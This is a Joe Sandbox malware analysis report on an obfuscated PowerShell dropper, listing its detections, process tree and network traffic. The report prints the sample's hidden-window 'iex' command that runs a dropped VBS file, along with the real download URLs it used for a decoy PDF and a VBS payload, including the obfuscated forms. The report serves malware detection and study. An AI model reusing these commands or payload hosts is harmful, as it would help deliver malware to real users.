Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
raEyjKggAf.ps1

Overview

General Information

Sample name:raEyjKggAf.ps1
renamed because original name is a hash value
Original sample name:ae4ce5950a66f479129844f0bc9f43b4802df2bb28995aef29abbf0ba300b270.ps1
Analysis ID:1578234
MD5:99bc052a7f6d2e62a0735f79b86a543d
SHA1:eb62356e6d752cb670b6ff3568a376c5fd4adafa
SHA256:ae4ce5950a66f479129844f0bc9f43b4802df2bb28995aef29abbf0ba300b270
Tags:185-236-228-9287-120-112-91ps1www-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 64 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 6420 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 5676 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 4892 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1660,i,1496304434679265413,14723031609339251811,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 988 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2244JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_2244.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2244, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'", ProcessId: 64, ProcessName: powershell.exe
      Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2244, TargetFilename: C:\Users\Public\hwj.vbs
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", ProcessId: 2244, ProcessName: powershell.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2244, TargetFilename: C:\Users\Public\hwj.vbs
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", ProcessId: 2244, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 988, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: raEyjKggAf.ps1Avira: detected
      Multi AV Scanner detection for submitted file
      Source: raEyjKggAf.ps1Virustotal: Detection: 30%Perma Link
      Source: raEyjKggAf.ps1ReversingLabs: Detection: 34%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.3% probability
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49714 version: TLS 1.2
      Source: Binary string: gn.pdb source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbi source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C04000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000003.00000002.2208043050.0000018BEFC3F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2320310651.000001E9AD8F8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb; source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbU source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbX source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C04000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2421070129.000001E9C7BA0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2205844898.0000018BEF989000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2206351579.0000018BEF9C9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: nt.Automation.pdb-4437-8B11-F424491E3931}\InprocSe source: powershell.exe, 00000003.00000002.2203371546.0000018BED8BA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: lib.pdbw source: powershell.exe, 00000000.00000002.2414247428.000001E9C78F0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 11:52:49 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9B12C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: powershell.exe, 00000003.00000002.2207789222.0000018BEFC0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
      Source: svchost.exe, 00000007.00000002.3371178265.000002AEC628D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80903000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000000.00000002.2405807547.000001E9BF98E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405807547.000001E9BF84C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9AF7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9B12C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9B12FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2325977680.000001E9B1358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9B12FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9AFA12000.00000004.00000800.00020000.00000000.sdmp, raEyjKggAf.ps1String found in binary or memory: http://www.bluua7maxxlasua7r.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.2420839801.000001E9C7A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cox
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9AF7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B8130E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 00000007.00000003.2275115760.000002AEC5FD0000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9B0412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80903000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.2405807547.000001E9BF98E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405807547.000001E9BF84C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9B12BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astua7ntua7rprisua7s.com.pk/ms/List%20of%20rua7quirua7d%20itua7ms%20and%20sua7rvicua7s.p
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49714 version: TLS 1.2
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD345561510_2_00007FFD34556151
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34553CFA0_2_00007FFD34553CFA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD3454193D3_2_00007FFD3454193D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34545FB63_2_00007FFD34545FB6
      Source: classification engineClassification label: mal84.evad.winPS1@20/59@5/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tqwlirn.ki0.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: raEyjKggAf.ps1Virustotal: Detection: 30%
      Source: raEyjKggAf.ps1ReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1660,i,1496304434679265413,14723031609339251811,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
